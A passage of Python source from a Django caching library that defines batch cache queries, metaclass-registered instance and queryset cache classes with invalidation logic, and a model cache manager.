force_update=True)\n\n def resolve_async(self):\n from .loader import FlashCacheLoader\n from thread_context.dataloader_context import DataLoadersFactory\n\n loader = DataLoadersFactory.get_loader_for(FlashCacheLoader)\n return loader.load(self)\n\n\nclass BatchCacheQuery(object):\n \"\"\" Class to make multiple cache queries into one\n \"\"\"\n def __init__(self, *args, **queries):\n if args:\n self.queries = args[0]\n else:\n self.queries = queries\n\n def push(self, *args, **kwargs):\n if args:\n self.queries.update(args[0])\n else:\n self.queries.update(kwargs)\n\n def get(self, only_cache=False, none_on_exception=False,\n return_exceptions=False):\n all_cache_keys = set()\n coroutines_dict = {}\n value_dict = {}\n\n for key, cache_query in self.queries.items():\n coroutine = cache_query.resolve_coroutine()\n cache_keys = coroutine.send(None)\n all_cache_keys.update(cache_keys)\n coroutines_dict[key] = (coroutine, cache_keys)\n\n all_cache_keys = list(all_cache_keys)\n all_cache_result, all_stale_data_dict = cache_get_many(all_cache_keys)\n\n for key in coroutines_dict:\n coroutine, cache_keys = coroutines_dict[key]\n result_dict = {}\n stale_data_dict = {}\n\n to_continue = False\n for cache_key in cache_keys:\n if cache_key in all_cache_result:\n 
result_dict[cache_key] = all_cache_result[cache_key]\n elif only_cache:\n to_continue = True\n break\n elif cache_key in all_stale_data_dict:\n stale_data_dict[cache_key] = all_stale_data_dict[cache_key]\n if to_continue:\n continue\n\n try:\n value = coroutine.send((result_dict, stale_data_dict))\n value_dict[key] = value\n except Exception as e:\n if return_exceptions:\n value_dict[key] = e\n elif none_on_exception:\n value_dict[key] = None\n else:\n raise\n return value_dict\n\n\nclass BaseModelQueryCacheMeta(ABCMeta):\n \"\"\" Meta class for BaseModelQueryCache class.\n\n Deriving it from ABCMeta because BaseModelQueryCache is\n derived from Cache class wich has metaclass ABCMeta\n \"\"\"\n model_caches = defaultdict(list)\n model_caches_on_target_model = defaultdict(list)\n\n def __init__(self, *args, **kwargs):\n \"\"\" self is the class with BaseModelQueryCacheMeta as its\n metaclass\n \"\"\"\n super(BaseModelQueryCacheMeta, self).__init__(*args, **kwargs)\n\n if is_abstract_class(self):\n return\n\n # register self in model_caches dict corressponding to all the models\n # against which cache should get invalidated.\n for model in self.get_invalidation_models():\n self.model_caches[model].append(self)\n\n target_models = self.get_cache_model()\n if target_models:\n if not isinstance(target_models, (list, tuple)):\n # If it's a single model\n target_models = [target_models]\n for target_model in target_models:\n self.model_caches_on_target_model[target_model].append(self)\n\n\nclass BaseModelQueryCache(six.with_metaclass(BaseModelQueryCacheMeta, Cache)):\n \"\"\" Base class for all cache classes which cache some query's result\n on assosiated model.\n \"\"\"\n generic_fields_support = True\n\n def __init__(self, *args, **kwargs):\n if USING_KWARG in kwargs:\n self.using = kwargs.pop(USING_KWARG)\n else:\n self.using = self.get_using()\n super(BaseModelQueryCache, self).__init__(*args, **kwargs)\n\n @abstractproperty\n def model(self):\n pass\n\n def get_cache_model(self):\n return None\n\n @abstractproperty\n def key_fields(self):\n pass\n\n def get_using(self):\n return flash_settings.db_discoverer_func(self.model)\n\n def get_queryset(self):\n return self.model.objects.using(self.using)\n\n @instancemethod\n def get(self, *args, **kwargs):\n if USING_KWARG in kwargs:\n self.using = kwargs.pop(USING_KWARG)\n return super(BaseModelQueryCache, self).get(*args, **kwargs)\n\n @instancemethod\n def set(self, *args, **kwargs):\n return super(BaseModelQueryCache, self).set(*args, **kwargs)\n\n @abstractmethod\n def get_invalidation_models(self):\n pass\n\n @abstractmethod\n def get_keys_to_be_invalidated(self, instance, signal, using):\n pass\n\n def get_field_dict(self, *args, **kwargs):\n \"\"\" Returns the given params as dict of field_name as key\n and given param value as value\n \"\"\"\n field_dict = {}\n args_len = len(args)\n if args:\n # put all values in args in same order as of field_name in\n # key_fields starting.\n for i in range(args_len):\n field_name = self.key_fields[i]\n field_dict[field_name] = args[i]\n if kwargs:\n # iterate over all rest key_fields and take values from kwargs\n for field_name in self.key_fields[args_len:]:\n if field_name in kwargs:\n field_dict[field_name] = kwargs[field_name]\n else:\n # check if field is passed in kwargs as attname of field\n # If field is a related field (E.g. ForeignKey) then its\n # attname is actually postfixed with `_id`.\n # E.g. 
user field has attname user_id\n field = self.model._meta.get_field(field_name)\n if field.attname in kwargs:\n field_dict[field.attname] = kwargs[field.attname]\n else:\n raise KeyFieldNotPassed(field_name)\n return field_dict\n\n @instancemethod\n def get_key(self, *args, **kwargs):\n cls_name = self.__class__.__name__\n using = kwargs.pop(USING_KWARG, self.using)\n key = '%s__%s__%s' % (self.cache_type, using, cls_name)\n field_dict = self.get_field_dict(*args, **kwargs)\n\n for field_name in self.key_fields:\n if self.generic_fields_support:\n if hasattr(self.model, field_name):\n field_obj = getattr(self.model, field_name)\n GenericForeignKey = importGenericForeignKey()\n if isinstance(field_obj, GenericForeignKey):\n value = field_dict[field_name]\n if isinstance(value, tuple):\n ctype_id, object_id = value\n else:\n from django.contrib.contenttypes.models import ContentType\n ctype_id = ContentType.objects_cache.get_for_model(\n value).id\n object_id = getattr(value, value._meta.pk.attname)\n key += '__%s-%s' % (ctype_id, object_id)\n continue\n\n field = self.model._meta.get_field(field_name)\n\n if field_name in field_dict:\n value = field_dict[field_name]\n else:\n value = field_dict[field.attname]\n if isinstance(value, models.Model):\n # get the pk value on instance\n if field.rel:\n rel_model = field.rel.to\n else:\n # In very rare cases, field.rel is found to be None\n # that I do not know why.\n # fallback method to get rel_model\n rel_model = value.__class__\n value = getattr(value, rel_model._meta.pk.attname)\n \"\"\"\n if isinstance(value, unicode):\n value = value.encode('utf-8')\n \"\"\"\n key += '__%s' % str(value)\n key += '__v%s' % self.version\n key = memcache_key_escape(key)\n return key\n\n\nclass InstanceCacheMeta(BaseModelQueryCacheMeta):\n \"\"\" Meta class for InstanceCache class\n \"\"\"\n instance_cache_classes = defaultdict(list)\n\n def __new__(cls, *args, **kwargs):\n ncls = super(InstanceCacheMeta, cls).__new__(cls, *args, **kwargs)\n if is_abstract_class(ncls):\n return ncls\n model = ncls.model\n # store the new class's single instance with its model\n # in instance_cache_classes dict\n cls.instance_cache_classes[model].append(ncls)\n if (six.get_unbound_function(ncls.get_instance) ==\n six.get_unbound_function(InstanceCache.get_instance)):\n # if the get_instance method is not overriden then mark the class\n # as simple\n ncls.is_simple = True\n else:\n ncls.is_simple = False\n # ask the class the class to create assosiated related instance classes\n # if any\n ncls.register_related_caches()\n return ncls\n\n\nclass KeyFieldNotPassed(Exception):\n def __init__(self, field_name):\n msg = 'key field `%s` not given' % field_name\n super(KeyFieldNotPassed, self).__init__(msg)\n\n\nclass SameModelInvalidationCache(object):\n \"\"\" Mixin class to be used with InstanceCache, QuerysetCache classes.\n \"\"\"\n\n def _get_invalidation_models(self):\n return [self.model]\n\n def _get_keys_to_be_invalidated(self, instance, signal, using):\n keys = []\n for params in self.get_invalidation_params_list_(instance, signal):\n keys.append(self.get_key(*params, **{USING_KWARG: using}))\n return keys\n\n def get_invalidation_params_list_(self, instance, signal):\n \"\"\" It's called when an instance gets saved and caches\n have to be invalidated.\n\n Returns the list of params on which keys to be invalidated.\n \"\"\"\n params_list = []\n instances = []\n\n if isinstance(instance, tuple):\n # case when instances of many_to_many through model are added\n # or removed.\n 
instance, _, model, pk_set = instance\n if len(self.key_fields) == 1:\n if (self.key_fields[0] ==\n instance.__class__._meta.object_name.lower()):\n params = (instance.pk,)\n params_list = [params]\n elif (self.key_fields[0] ==\n model._meta.object_name.lower()):\n for pk in pk_set:\n params_list.append((pk,))\n return params_list\n\n filter_dict = {\n instance.__class__._meta.object_name.lower():\n instance.pk,\n '%s__in' % model._meta.object_name.lower():\n pk_set,\n }\n instances = list(self.model.objects.filter(**filter_dict))\n else:\n instances = [instance]\n\n for instance in instances:\n params = []\n params_pre = []\n instance_state_diff = instance.get_state_diff()\n for field_name in self.key_fields:\n try:\n field = self.model._meta.get_field(field_name)\n params.append(getattr(instance, field.attname))\n if (field.attname in instance_state_diff and\n 'pre' in instance_state_diff[field.attname]):\n params_pre.append(instance_state_diff[\n field.attname]['pre'])\n else:\n params_pre.append(getattr(instance, field.attname))\n except:\n if hasattr(self.model, field_name):\n field_obj = getattr(self.model, field_name)\n GenericForeignKey = importGenericForeignKey()\n if isinstance(field_obj, GenericForeignKey):\n ctype_field_name = field_obj.ct_field\n ctype_field_attname = self.model._meta.get_field(\n ctype_field_name).attname\n object_id_attname = field_obj.fk_field\n params.append((getattr(instance, ctype_field_attname),\n (getattr(instance, object_id_attname))))\n if (object_id_attname in instance_state_diff and\n 'pre' in instance_state_diff[object_id_attname]):\n params_pre.append((\n getattr(instance, ctype_field_attname),\n instance_state_diff[object_id_attname]['pre']))\n else:\n params_pre.append((\n getattr(instance, ctype_field_attname),\n getattr(instance, object_id_attname)))\n continue\n raise\n params_list.append(params)\n if params_pre != params:\n params_list.append(params_pre)\n return params_list\n\n\nclass InstanceCache(six.with_metaclass(InstanceCacheMeta,\n BaseModelQueryCache, SameModelInvalidationCache)):\n \"\"\" This class is used when an instance of a model is cached on\n some fields of same model.\n\n Derived class can define following (*s are mandatory):\n\n 1) model: ModelClass (* attribute)\n 2) key_fields: list of field_names (* attribute)\n 3) select_related: list of related instances (attribute)\n 4) get_instance : custom method to get instance (method)\n \"\"\"\n cache_type = 'InstanceCache'\n\n @abstractproperty\n def key_fields(self):\n pass\n\n @classmethod\n def register_related_caches(cls):\n cls.related_caches = {}\n if not hasattr(cls, 'select_related'):\n return\n for relation in cls.select_related:\n class_name = '%s__%s' % (cls.__name__, relation)\n # Create new RelatedInstanceCache class dynamically\n related_cache_class = type(class_name, (RelatedInstanceCache,), {\n 'model': cls.model,\n 'key_fields': cls.key_fields,\n 'relation': relation,\n 'version': cls.version,\n 'timeout': cls.timeout,\n })\n # And store it's instance in related_caches\n cls.related_caches[relation] = related_cache_class\n\n @instancemethod\n def get_cache_model(self):\n return self.model\n\n @instancemethod\n def get_invalidation_models(self):\n return self._get_invalidation_models()\n\n def get_keys_to_be_invalidated(self, instance, signal, using):\n return self._get_keys_to_be_invalidated(instance, signal, using)\n\n def get_extra_keys(self, *args, **kwargs):\n \"\"\" Returns the keys from assosiated related cache classes\n for given params.\n \"\"\"\n if 
not hasattr(self, 'select_related'):\n return\n keys = []\n for relation in self.select_related:\n related_cache = self.related_caches[relation]\n key = related_cache.get_key(*args, **kwargs)\n keys.append(key)\n return keys\n\n def get_instance(self, **filter_dict):\n \"\"\" Returns the instance of model.\n Can be overriden in derived classes.\n \"\"\"\n try:\n return self.get_queryset().get(**filter_dict)\n except self.model.DoesNotExist:\n if self.is_simple:\n # Returning the None so that it gets cached.\n return None\n # If there is some problem with storing\n # DoesNotExist as None in cache, then comment upper return\n # and uncomment below return\n # return DontCache(None)\n raise\n except:\n raise\n\n def remove_fk_instances(self, instance):\n \"\"\" Removes all related instances through fields on instance\n before the instance gets saved in cache\n \"\"\"\n if instance is None:\n return\n\n for prop in flash_properties[instance.__class__]:\n attr = '_%s_cache' % prop\n if hasattr(instance, attr):\n delattr(instance, attr)\n\n for field in instance._meta.fields:\n if field.rel:\n attr = '_%s_cache' % field.name\n if hasattr(instance, attr):\n delattr(instance, attr)\n\n def get_value_for_params(self, *args, **kwargs):\n params = self.get_field_dict(*args, **kwargs)\n instance = self.get_instance(**params)\n return instance\n\n def pre_set_process_value(self, instance, *args, **kwargs):\n instance_clone = copy.copy(instance)\n self.remove_fk_instances(instance_clone)\n return instance_clone\n\n def get_extra_key_value_dict(self, instance, *args, **kwargs):\n \"\"\" Returns the key value dict from relations given in select_related\n for given instance. Used when instance is saved in cache.\n \"\"\"\n if instance is None:\n return\n if self.related_caches:\n key_value_dict = {}\n for relation in self.related_caches:\n related_value = instance\n for field_name in relation.split('__'):\n related_value = getattr(related_value, field_name)\n related_cache = self.related_caches[relation]\n related_key = related_cache.get_key(*args, **kwargs)\n key_value_dict[related_key] = related_value\n return key_value_dict\n\n def post_process_value(self, instance, key_value_dict, *args, **kwargs):\n \"\"\" Patches all related instances got from cache in key_value_dict\n to instance.\n \"\"\"\n if instance is None:\n if self.is_simple:\n cache_model = self.get_cache_model()\n raise cache_model.DoesNotExist(\n \"%s matching query does not exist.\" %\n cache_model._meta.object_name)\n return instance\n if not hasattr(self, 'select_related'):\n return instance\n if key_value_dict is None:\n return instance\n keys = []\n relation_keys = {}\n for relation in self.select_related:\n related_cache = self.related_caches[relation]\n key = related_cache.get_key(*args, **kwargs)\n keys.append(key)\n relation_keys[relation] = key\n\n for relation in self.select_related:\n key = relation_keys[relation]\n if not key in key_value_dict:\n continue\n value = key_value_dict[key]\n last_field_name = None\n related_value = instance\n for field_name in (relation.split('__') + [None]):\n if field_name is None:\n setattr(related_value, last_field_name, value)\n else:\n if last_field_name:\n if not hasattr(related_value, last_field_name):\n break\n related_value = getattr(related_value, last_field_name)\n last_field_name = field_name\n return instance\n\n\nclass RelatedInstanceCacheMeta(InstanceCacheMeta):\n \"\"\" Meta class for RelatedInstanceCache\n \"\"\"\n def __new__(cls, *args, **kwargs):\n ncls = 
super(RelatedInstanceCacheMeta, cls).__new__(cls, *args, **kwargs)\n if is_abstract_class(ncls):\n return ncls\n # store all models encountered in reaching last field of relation\n # in rel_models of new class.\n model = ncls.model\n rel_models = {}\n rel_models_inv = {}\n rel_model = model\n relation_splits = ncls.relation.split('__')\n relation_str = ''\n for field_name in relation_splits:\n rel_model = rel_model._meta.get_field(field_name).rel.to\n if relation_str:\n relation_str += '__%s' % field_name\n else:\n relation_str += field_name\n rel_models[rel_model] = relation_str\n rel_models_inv[relation_str] = rel_model\n ncls.rel_models = rel_models\n ncls.rel_models_inv = rel_models_inv\n return ncls\n\n\nclass RelatedModelInvalidationCache(object):\n \"\"\" Mixin class used in RelatedInstanceCache, RelatedQuerysetCache\n \"\"\"\n def _get_invalidation_models(self):\n return [self.model] + self.rel_models.keys()\n\n def _get_keys_to_be_invalidated(self, instance, signal, using):\n keys = []\n for params in self.get_invalidation_params_list(instance, signal):\n keys.append(self.get_key(*params, **{USING_KWARG: using}))\n return keys\n\n def get_invalidation_params_list(self, instance, signal):\n \"\"\" It's called when an instance gets saved and caches\n have to be invalidated.\n\n Returns the list of params on which keys to be invalidated.\n \"\"\"\n key_params_list = []\n\n key_fields_attname = []\n for field_name in self.key_fields:\n field = self.model._meta.get_field(field_name)\n key_fields_attname.append(field.attname)\n\n if isinstance(instance, self.model):\n # get all values in instance assosiated with\n # key_fields and put in params list.\n field_values = []\n field_values_pre = []\n instance_state_diff = instance.get_state_diff()\n for field_attname in key_fields_attname:\n value = getattr(instance, field_attname)\n field_values.append(value)\n if field_attname in instance_state_diff and (\n 'pre' in instance_state_diff[field_attname]):\n field_values_pre.append(instance_state_diff[field_attname]['pre'])\n else:\n field_values_pre.append(value)\n key_params_list.append(tuple(field_values))\n if field_values_pre != field_values:\n key_params_list.append(tuple(field_values_pre))\n\n for rel_model in self.rel_models:\n if isinstance(instance, rel_model):\n filter_dict = {\n self.rel_models[rel_model]: instance,\n }\n # get list of all values using database\n attname_values_list = self.model.objects.filter(\n **filter_dict).values(*key_fields_attname)\n for value in attname_values_list:\n key_params_list.append(tuple(\n [value[attname] for attname in key_fields_attname]))\n if isinstance(instance, tuple):\n # case when instances of many_to_many through model are added\n # or removed.\n instance, _, model, pk_set = instance\n if len(self.key_fields) == 1:\n if (self.key_fields[0] ==\n instance.__class__._meta.object_name.lower()):\n key_params_list.append((instance.id,))\n elif (self.key_fields[0] ==\n model._meta.object_name.lower()):\n for pk in pk_set:\n key_params_list.append((pk,))\n else:\n filter_dict = {\n instance.__class__._meta.object_name.lower():\n instance.pk,\n '%s__in' % model._meta.object_name.lower():\n pk_set,\n }\n # get list of all values using database\n attname_values_list = self.model.objects.filter(\n **filter_dict).values(*key_fields_attname)\n for value in attname_values_list:\n key_params_list.append(tuple(\n [value[attname] for attname in key_fields_attname]))\n return key_params_list\n\n\n\nclass 
RelatedInstanceCache(six.with_metaclass(RelatedInstanceCacheMeta,\n InstanceCache, RelatedModelInvalidationCache)):\n \"\"\" This class is used when an instance through a related field is cached on\n some fields of a model.\n\n Derived class can define following (*s are mandatory):\n\n 1) model: ModelClass (* attribute)\n 2) key_fields: list of field_names (* attribute)\n 3) relation: related field_name (* attribute)\n 4) get_instance : custom method to get instance (method)\n \"\"\"\n generic_fields_support = False\n\n cache_type = 'RelatedInstanceCache'\n\n @abstractproperty\n def relation(self):\n pass\n\n @instancemethod\n def get_cache_model(self):\n return self.rel_models_inv[self.relation]\n\n @instancemethod\n def get_invalidation_models(self):\n return RelatedModelInvalidationCache._get_invalidation_models(self)\n\n def get_keys_to_be_invalidated(self, instance, signal, using):\n return RelatedModelInvalidationCache._get_keys_to_be_invalidated(\n self, instance, signal, using)\n\n def get_instance(self, **filter_dict):\n dep_instance = self.get_queryset().select_related(\n self.relation).get(**filter_dict)\n instance = dep_instance\n for rel_attr in self.relation.split('__'):\n instance = getattr(instance, rel_attr)\n return instance\n\n\nclass QuerysetCacheMeta(BaseModelQueryCacheMeta):\n \"\"\" Meta class of QuerysetCache class\n \"\"\"\n queryset_cache_classes = defaultdict(list)\n\n def __new__(cls, *args, **kwargs):\n ncls = super(QuerysetCacheMeta, cls).__new__(cls, *args, **kwargs)\n if is_abstract_class(ncls):\n return ncls\n model = ncls.model\n cls.queryset_cache_classes[model].append(ncls)\n if (six.get_unbound_function(ncls.get_result) ==\n six.get_unbound_function(QuerysetCache.get_result)):\n ncls.is_simple = True\n else:\n ncls.is_simple = False\n return ncls\n\n\nclass QuerysetCache(six.with_metaclass(QuerysetCacheMeta,\n BaseModelQueryCache, SameModelInvalidationCache)):\n \"\"\" This class is used when result of filter queryset or its\n descendent queryset of a model is cached on some fields of same model.\n\n Derived class can define following (*s are mandatory):\n\n 1) model: ModelClass (* attribute)\n 2) key_fields: list of field_names (* attribute)\n 4) get_result : custom method to get result (method)\n \"\"\"\n cache_type = 'QuerysetCache'\n\n caching_model_instances = True\n\n @abstractproperty\n def key_fields(self):\n pass\n\n @instancemethod\n def get_cache_model(self):\n if self.caching_model_instances:\n return self.model\n return None\n\n @instancemethod\n def get_invalidation_models(self):\n return self._get_invalidation_models()\n\n def get_keys_to_be_invalidated(self, instance, signal, using):\n return self._get_keys_to_be_invalidated(instance, signal, using)\n\n def get_result(self, **params):\n \"\"\" By default returns the filter queryset's result\n \"\"\"\n return list(self.get_queryset().filter(**params))\n\n def get_value_for_params(self, *args, **kwargs):\n params = self.get_field_dict(*args, **kwargs)\n result = self.get_result(**params)\n return result\n\n\nclass RelatedQuerysetCacheMeta(QuerysetCacheMeta):\n \"\"\" Meta class of RelatedQuerysetCache class\n \"\"\"\n def __new__(cls, *args, **kwargs):\n ncls = super(RelatedQuerysetCacheMeta, cls).__new__(cls, *args, **kwargs)\n if is_abstract_class(ncls):\n return ncls\n # store all models encountered in reaching last field of relation\n # in rel_models of new class.\n model = ncls.model\n rel_models = {}\n rel_models_inv = {}\n rel_model = model\n relation_splits = 
ncls.relation.split('__')\n relation_str = ''\n for field_name in relation_splits:\n rel_model = rel_model._meta.get_field(field_name).rel.to\n if relation_str:\n relation_str += '__%s' % field_name\n else:\n relation_str += field_name\n rel_models[rel_model] = relation_str\n rel_models_inv[relation_str] = rel_model\n ncls.rel_models = rel_models\n ncls.rel_models_inv = rel_models_inv\n return ncls\n\n\nclass RelatedQuerysetCache(six.with_metaclass(RelatedQuerysetCacheMeta,\n QuerysetCache, RelatedModelInvalidationCache)):\n \"\"\" This class is used when result of filter queryset or its descendent\n queryet through a related field is cached on some fields of a model.\n\n Derived class can define following (*s are mandatory):\n\n 1) model: ModelClass (* attribute)\n 2) key_fields: list of field_names (* attribute)\n 3) relation: related field_name (* attribute)\n 4) get_result : custom method to get result (method)\n \"\"\"\n generic_fields_support = False\n\n cache_type = 'RelatedQuerysetCache'\n\n @instancemethod\n def get_cache_model(self):\n return self.rel_models_inv[self.relation]\n\n @abstractproperty\n def relation(self):\n pass\n\n @instancemethod\n def get_invalidation_models(self):\n return RelatedModelInvalidationCache._get_invalidation_models(self)\n\n def get_keys_to_be_invalidated(self, instance, signal, using):\n return RelatedModelInvalidationCache._get_keys_to_be_invalidated(\n self, instance, signal, using)\n\n def get_result(self, **params):\n qset = self.get_queryset().filter(**params).select_related(\n self.relation)\n return list([getattr(i, self.relation) for i in qset])\n\n\nclass QuerysetExistsCache(QuerysetCache):\n \"\"\" QuerysetCache derived class to cache existance of instances\n \"\"\"\n caching_model_instances = False\n\n @abstractproperty\n def key_fields(self):\n pass\n\n def get_result(self, **params):\n return self.get_queryset().filter(**params).exists()\n\n def post_process_value(self, value, *args, **kwargs):\n \"\"\" It's defined cause cache retuned values are integers (0 or 1)\n It converts them to boolean\n \"\"\"\n if value is None:\n return value\n return bool(value)\n\n\nclass CacheManager(six.with_metaclass(ABCMeta, object)):\n \"\"\" Base class for model or non model based cache managers\n \"\"\"\n\n\nclass CachedReverseSingleRelatedObjectDescriptor(\n ReverseSingleRelatedObjectDescriptor):\n def __init__(self, field_with_rel, cache_class):\n super(CachedReverseSingleRelatedObjectDescriptor, self).__init__(\n field_with_rel)\n self.cache_class = cache_class\n\n def __get__(self, instance, instance_type=None):\n if instance is None:\n return self\n try:\n return getattr(instance, self.cache_name)\n except AttributeError:\n val = getattr(instance, self.field.attname)\n if val is None:\n # If NULL is an allowed value, return it.\n if self.field.null:\n return None\n raise self.field.rel.to.DoesNotExist\n rel_obj = self.cache_class.get(val)\n setattr(instance, self.cache_name, rel_obj)\n return rel_obj\n\ndef patch_related_object_descriptor(model, key, cache_class):\n orig_key = '_%s_using_db' % key\n setattr(model, orig_key, getattr(model, key))\n setattr(model, key, CachedReverseSingleRelatedObjectDescriptor(\n model._meta.get_field(key), cache_class))\n\n\nclass ModelCacheManagerMeta(ABCMeta):\n \"\"\" Meta class for ModelCacheManager\n \"\"\"\n model_cache_managers = {}\n model_cached_foreignkeys = defaultdict(list)\n\n def __new__(cls, *args, **kwargs):\n own_attrs = args[2]\n model = own_attrs['model']\n\n if model in 
cls.model_cache_managers:\n # Commenting assertion due to some module reloading bug\n # assert False, \"More than one ModelCacheManager can't be defined for %s\" % (\n # model,)\n return cls.model_cache_managers[model]\n\n if hasattr(model, 'CacheMeta'):\n cachemeta_attrs = {}\n for key, value in model.CacheMeta.__dict__.items():\n if not key.startswith('_'):\n cachemeta_attrs[key] = value\n\n mergable_keys = [\n 'get_key_fields_list',\n 'filter_key_fields_list',\n 'cached_foreignkeys'\n ]\n\n for key, value in cachemeta_attrs.items():\n if key in mergable_keys:\n if (isinstance(value, (tuple, list)) and\n key in own_attrs and\n [i for i in value if i in own_attrs[key]]):\n assert False, \"`%s` in CacheMeta and %s should not have common values\" % (\n key, args[0])\n own_attrs[key] = cachemeta_attrs[key] + own_attrs.get(key, [])\n elif key in own_attrs:\n assert False, \"`%s` can't be defined in both CacheMeta and %s\" % (\n key, args[0])\n else:\n own_attrs[key] = cachemeta_attrs[key]\n\n ncls = super(ModelCacheManagerMeta, cls).__new__(cls, *args, **kwargs)\n if is_abstract_class(ncls):\n return ncls\n model = ncls.model\n ncls_instance = ncls()\n\n # register instance of new ModelCacheManager class\n cls.model_cache_managers[model] = ncls_instance\n\n # register all simple_instance_cache_classes\n # and simple_queryset_cache_classes so that `get` and `filter` methods\n # of model cache manager can decide which cache class to be used\n ncls.instance_cache_classes = []\n ncls.simple_instance_cache_classes = {}\n\n if hasattr(ncls_instance, 'get_key_fields_list'):\n # create instance_cache_classes for assosiated model\n ncls_instance.register_instance_classes()\n\n for instance_cache_class in InstanceCacheMeta.instance_cache_classes[\n model]:\n ncls.instance_cache_classes.append(instance_cache_class)\n if instance_cache_class.is_simple:\n key_fields_sorted = tuple(\n sorted(instance_cache_class.key_fields))\n ncls.simple_instance_cache_classes[\n key_fields_sorted] = instance_cache_class\n\n ncls.queryset_cache_classes = []\n ncls.simple_queryset_cache_classes = {}\n\n if hasattr(ncls_instance, 'filter_key_fields_list'):\n # create queryset_cache_classes for assosiated model\n ncls_instance.register_queryset_classes()\n\n for queryset_cache_class in QuerysetCacheMeta.queryset_cache_classes[\n model]:\n ncls.queryset_cache_classes.append(queryset_cache_class)\n if queryset_cache_class.is_simple:\n key_fields_sorted = tuple(\n sorted(queryset_cache_class.key_fields))\n ncls.simple_queryset_cache_classes[\n key_fields_sorted] = queryset_cache_class\n\n if hasattr(ncls_instance, 'cached_foreignkeys'):\n cls.model_cached_foreignkeys[model] = ncls_instance.cached_foreignkeys\n\n return ncls\n\n @classmethod\n def create_cache_managers_from_models(cls):\n for model in get_models():\n if (not model in cls.model_cache_managers and\n hasattr(model, 'CacheMeta')):\n cache_manager_name = 'Auto%sCacheManager' % model.__name__\n type(cache_manager_name, (ModelCacheManager,), {\n 'model': model})\n\n\n @classmethod\n def patch_cached_foreignkeys(cls):\n for model, cached_foreignkeys in cls.model_cached_foreignkeys.items():\n for key in cached_foreignkeys:\n try:\n rel_model = model._meta.get_field(key).rel.to\n rel_model_pk_name = rel_model._meta.pk.name\n cache_class = rel_model.cache.get_cache_class_for(\n rel_model_pk_name)\n patch_related_object_descriptor(\n model, key, cache_class)\n except CacheNotRegistered:\n assert False, (\"Cached foreignkey can't be made on field \"+\n \"`%s` of %s. 
Because %s is not cached on \"+\n \"it's primary key\") % (\n key, model, model._meta.get_field(key).rel.to)\n\n\n @classmethod\n def get_model_cache_manager(cls, model):\n \"\"\" Returns the cache manager assosiated with given model\n \"\"\"\n if model not in cls.model_cache_managers:\n # If some model cache manager class is not defined for given\n # model then create it dynamically\n class_name = 'Auto%sCacheManager' % model.__name__\n type(class_name, (ModelCacheManager,), {\n 'model': model})\n return cls.model_cache_managers[model]\n\n\nclass CacheNotRegistered(Exception):\n def __init__(self, model, key_fields):\n msg = ('No cache registered for model `%s` on fields '+\n '`%s`') % (str(model), str(tuple(key_fields)))\n super(CacheNotRegistered, self).__init__(msg)\n\n\nclass ModelCacheManager(six.with_metaclass(ModelCacheManagerMeta,\n CacheManager)):\n version = 0\n timeout = flash_settings.DEFAULT_TIMEOUT\n\n @abstractproperty\n def model(self):\n pass\n\n def register_instance_classes(self):\n \"\"\" Create InstanceCache classes dynamically\n for each pair in get_key_fields_list.\n \"\"\"\n for key_fields in self.get_key_fields_list:\n class_name = '%sCacheOn' % self.model.__name__\n for field_name in key_fields:\n class_name += field_name.title()\n type(class_name, (InstanceCache,), {\n 'model': self.model,\n 'key_fields': key_fields,\n 'version': self.version,\n 'timeout': self.timeout,\n })\n\n def register_queryset_classes(self):\n \"\"\" Create QuerysetCache classes dynamically\n for each pair in filter_key_fields_list.\n \"\"\"\n for key_fields in self.filter_key_fields_list:\n class_name = '%sCacheOn' % self.model.__name__\n for field_name in key_fields:\n class_name += field_name.title()\n type(class_name, (QuerysetCache,), {\n 'model': self.model,\n 'key_fields': key_fields,\n 'version': self.version,\n 'timeout': self.timeout,\n })\n\n def get_key_fields(self, args_or_kwargs):\n key_fields = []\n\n is_dict = False\n if isinstance(args_or_kwargs, dict):\n args_set = set(args_or_kwargs.keys())\n is_dict = True\n kwargs = args_or_kwargs\n else:\n args_set = set(args_or_kwargs)\n\n if 'pk' in args_set:\n args_set.remove('pk')\n if is_dict:\n value = kwargs.pop('pk')\n pk_field_name = self.model._meta.pk.name\n args_set.add(pk_field_name)\n if is_dict:\n kwargs[pk_field_name] = value\n\n for key in args_set:\n if key == USING_KWARG:\n continue\n try:\n field = self.model._meta.get_field(key)\n key_fields.append(field.name)\n except:\n if hasattr(self.model, key):\n field = getattr(self.model, key)\n GenericForeignKey = importGenericForeignKey()\n if isinstance(field, GenericForeignKey):\n key_fields.append(key)\n continue\n if key.endswith('_id'):\n key_fields.append(key[:-3])\n continue\n raise\n return tuple(sorted(key_fields))\n\n def get(self, **kwargs):\n \"\"\" Find the instance_cache_class for given params\n and return it's get result.\n \"\"\"\n key_fields = self.get_key_fields(kwargs)\n if key_fields in self.simple_instance_cache_classes:\n instance_cache_class = self.simple_instance_cache_classes[key_fields]\n return instance_cache_class.get(**kwargs)\n raise CacheNotRegistered(self.model, key_fields)\n\n def get_query(self, **kwargs):\n \"\"\" Find the instance_cache_class for given params\n and return it's object for given params.\n \"\"\"\n key_fields = self.get_key_fields(kwargs)\n if key_fields in self.simple_instance_cache_classes:\n instance_cache_class = self.simple_instance_cache_classes[key_fields]\n return instance_cache_class(**kwargs)\n raise 
CacheNotRegistered(self.model, key_fields)\n\n def get_async(self, **kwargs):\n \"\"\" await counterpart of get method\n \"\"\"\n return self.get_query(**kwargs).resolve_async()\n\n def get_async_or_none(self, **kwargs):\n from .loader import object_or_none\n return object_or_none(self.get_async(**kwargs))\n\n def get_async_or_404(self, **kwargs):\n from .loader import object_or_404\n return object_or_404(self.get_async(**kwargs))\n\n def get_cache_class_for(self, *args):\n \"\"\" Find the instance_cache_class for given params\n and return it's cache class.\n \"\"\"\n key_fields = self.get_key_fields(args)\n if key_fields in self.simple_instance_cache_classes:\n instance_cache_class = self.simple_instance_cache_classes[key_fields]\n return instance_cache_class\n raise CacheNotRegistered(self.model, args)\n\n def get_key(self, **kwargs):\n \"\"\" Find the instance_cache_class for given params\n and return it's get_key result.\n \"\"\"\n key_fields = self.get_key_fields(kwargs)\n if key_fields in self.simple_instance_cache_classes:\n instance_cache_class = self.simple_instance_cache_classes[key_fields]\n return instance_cache_class.get_key(**kwargs)\n raise CacheNotRegistered(self.model, key_fields)\n\n def filter(self, **kwargs):\n \"\"\" Find the queryset_cache_class for given params\n and return it's get result.\n \"\"\"\n key_fields = self.get_key_fields(kwargs)\n if key_fields in self.simple_queryset_cache_classes:\n queryset_cache_class = self.simple_queryset_cache_classes[key_fields]\n return queryset_cache_class.get(**kwargs)\n raise CacheNotRegistered(self.model, key_fields)\n\n def 